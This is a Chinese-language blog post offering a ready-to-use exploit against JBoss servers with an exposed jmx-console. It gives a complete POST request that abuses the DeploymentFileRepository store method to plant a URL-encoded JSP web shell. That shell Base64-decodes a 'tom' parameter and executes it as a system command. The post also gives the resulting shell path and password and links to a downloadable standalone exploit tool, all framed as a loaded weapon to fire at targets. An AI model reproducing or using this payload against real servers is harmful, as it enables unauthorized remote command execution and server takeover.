[原创]K8 Jboss jmx-console getshell exploit
https://www.cnblogs.com/k8gege/p/10645858.html
0x00 前言
今天内网遇到几台Jboss,使用MSF确实是有点烦,要打几条命令设置一堆参数,我一个粘贴搞定的
为什么非要使用手动打好几条命令,让外行人看起来牛逼吗?大家都知道黑客电影打字快并不是高手
那些水平不是很高的才一整天在外行人面前说,我用Linux系统我用MSF等等,用Linux并不会高人一等
Windows下也有一堆命令,懂CMD去用Linux也一样很简单,再说Linux一样有界面的,没什么好装的。
难道我会告诉你们我最虚拟机里用XP系统吗??OK,废话不多说,上道具,不对拿枪上好子弹开炮!
0x001 手动版 (提供子弹payload)
K8飞刀---漏洞调式/HackIE---POST提交(你也可以把子弹装到其它枪上)
目标: url + /jmx-console/HtmlAdaptor
提交数据
action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jbossjdk.war&argType=java.lang.String&arg1=jbossjdk&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%3c%25%40%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6f%72%67%2e%6a%62%6f%73%73%2e%75%74%69%6c%2e%42%61%73%65%36%34%22%25%3e%3c%25%74%72%79%20%7b%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%6f%6d%22%29%3b%53%74%72%69%6e%67%20%70%61%74%68%3d%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%52%65%71%75%65%73%74%55%52%49%28%29%29%3b%53%74%72%69%6e%67%20%64%69%72%3d%6e%65%77%20%46%69%6c%65%28%70%61%74%68%29%2e%67%65%74%50%61%72%65%6e%74%28%29%3b%69%66%28%63%6d%64%2e%65%71%75%61%6c%73%28%22%4e%7a%55%31%4e%67%22%29%29%7b%6f%75%74%2e%70%72%69%6e%74%28%22%5b%53%5d%22%2b%64%69%72%2b%22%5b%45%5d%22%29%3b%7d%53%74%72%69%6e%67%20%78%78%63%6d%64%20%3d%20%6e%65%77%20%53%74%72%69%6e%67%28%42%61%73%65%36%34%2e%64%65%63%6f%64%65%28%63%6d%64%29%29%3b%50%72%6f%63%65%73%73%20%63%68%69%6c%64%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%78%78%63%6d%64%29%3b%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%63%68%69%6c%64%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%2d%3e%7c%22%29%3b%69%6e%74%20%63%3b%77%68%69%6c%65%20%28%28%63%20%3d%20%69%6e%2e%72%65%61%64%28%29%29%20%21%3d%20%2d%31%29%20%7b%6f%75%74%2e%70%72%69%6e%74%28%28%63%68%61%72%29%63%29%3b%7d%69%6e%2e%63%6c%6f%73%65%28%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%7c%3c%2d%22%29%3b%74%72%79%20%7b%63%68%69%6c%64%2e%77%61%69%74%46%6f%72%28%29%3b%7d%20%63%61%74%63%68%20%28%49%6e%74%65%72%72%75%70%74%65%64%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%7d%7d%20%63%61%74%63%68%20%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%53%79%73%74%65%6d%2e%65%72%72%2e%70%72%69%6e%74%6c%6e%28%65%29%3b%7d%25%3e&argType=boolean&arg4=True
0x002 一键版(枪已上好弹药,向目标开炮吧)
exp分为两个版本,一个是独立的EXP,另一个已通过HackIE将payload加入K8飞刀漏洞库中,填写网址即可。
K8飞刀GetShell成功返回如下页面
0x003 CmdShell管理
成功后使用K8cmd来管理(无需尝试其它工具仅飞刀可连),再怎样也比MSF反弹后执行命令方便吧
cmdshell: url+/jbossjdk/jbossjdk.jsp tom
0x004 下载
独立EXP:https://github.com/k8gege/K8tools/blob/master/K8_JbossExp.exe
飞刀EXP:https://github.com/k8gege/K8tools/blob/master/K8data.mdb